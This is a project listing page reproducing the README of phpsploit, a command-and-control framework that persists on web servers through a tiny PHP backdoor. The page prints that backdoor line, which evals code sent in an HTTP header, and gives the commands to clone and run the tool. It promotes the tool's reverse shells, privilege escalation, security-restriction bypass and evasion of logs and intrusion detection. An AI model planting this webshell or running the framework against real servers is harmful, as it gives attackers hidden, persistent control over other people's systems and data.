Awesome Open Source
Awesome Open Source

Master

Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner tweet


travis build requires.io requirements codacy code quality lgtm alerts codecov coverage codeclimate maintainability

Created by nil0x42 and contributors


Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Quick Start

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Features

  • Efficient: More than 20 plugins to automate privilege-escalation tasks

    • Run commands and browse filesystem, bypassing PHP security restrictions
    • Upload/Download files between client and target
    • Edit remote files through local text editor
    • Run SQL console on target system
    • Spawn reverse TCP shells
  • Stealth: The framework is made by paranoids, for paranoids

    • Nearly invisible by log analysis and NIDS signature detection
    • Safe-mode and common PHP security restrictions bypass
    • Communications are hidden in HTTP Headers
    • Loaded payloads are obfuscated to bypass NIDS
    • http/https/socks4/socks5 Proxy support
  • Convenient: A robust interface with many crucial features

    • Detailed help for any option (help command)
    • Cross-platform on both client and server.
    • CLI supports auto-completion & multi-command
    • Session saving/loading feature & persistent history
    • Multi-request support for large payloads (such as uploads)
    • Provides a powerful, highly configurable settings engine
    • Each setting, such as user-agent has a polymorphic mode
    • Customisable environment variables for plugin interaction
    • Provides a complete plugin development API

Supported platforms (as attacker):

  • GNU/Linux
  • Mac OS X

Supported platforms (as target):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT

Contributors

🏆 Hall-of-fame

All contributors Thanks goes to these wonderful people:

nil0x42

💻 🚇 🔌 ⚠️

shiney-wh

💻 🔌

Wannes Rombouts

💻 🚧

Amine Ben Asker

💻 🚧

jose nazario

📖 🐛

Sujit Ghosal

📝

Zerdoumi

🐛

tristandostaler

🐛

Rohan Tarai

🐛

Jonas Lejon

📝

This project follows the all-contributors specification. Contributions of any kind welcome


Get A Weekly Email With Trending Projects For These Topics
No Spam. Unsubscribe easily at any time.
Python (1,143,484) 
Hacking (2,466) 
Redteam (558) 
Persistence (399) 
Backdoor (307) 
Post Exploitation (129) 
Webshell (128) 
Privilege Escalation (124) 
C2 (92) 
Web Hacking (69) 
Command And Control (62) 
Stealth (46) 
Hacktools (45) 
Blackhat (39) 
Hacking Framework (15) 
Advanced Persistent Threat (13) 
Php Webshell (12) 
Php Backdoor (10) 
Php Webshell Backdoor (4) 
Related Projects
Advertising 📦 9
All Projects
Application Programming Interfaces 📦 120
Applications 📦 181
Artificial Intelligence 📦 72
Blockchain 📦 70
Build Tools 📦 111
Cloud Computing 📦 79
Code Quality 📦 28
Collaboration 📦 30
Command Line Interface 📦 48
Community 📦 81
Companies 📦 60
Compilers 📦 60
Computer Science 📦 74
Configuration Management 📦 39
Content Management 📦 167
Control Flow 📦 197
Data Formats 📦 77
Data Processing 📦 266
Data Storage 📦 132
Economics 📦 60
Frameworks 📦 198
Games 📦 122
Graphics 📦 103
Hardware 📦 148
Integrated Development Environments 📦 47
Learning Resources 📦 147
Legal 📦 28
Libraries 📦 119
Lists Of Projects 📦 21
Machine Learning 📦 336
Mapping 📦 61
Marketing 📦 15
Mathematics 📦 55
Media 📦 228
Messaging 📦 97
Networking 📦 304
Operating Systems 📦 84
Operations 📦 120
Package Managers 📦 52
Programming Languages 📦 229
Runtime Environments 📦 96
Science 📦 42
Security 📦 375
Social Media 📦 26
Software Architecture 📦 70
Software Development 📦 68
Software Performance 📦 57
Software Quality 📦 127
Text Editors 📦 45
Text Processing 📦 131
User Interface 📦 310
User Interface Components 📦 465
Version Control 📦 29
Virtualization 📦 68
Web Browsers 📦 38
Web Servers 📦 25
Web User Interface 📦 194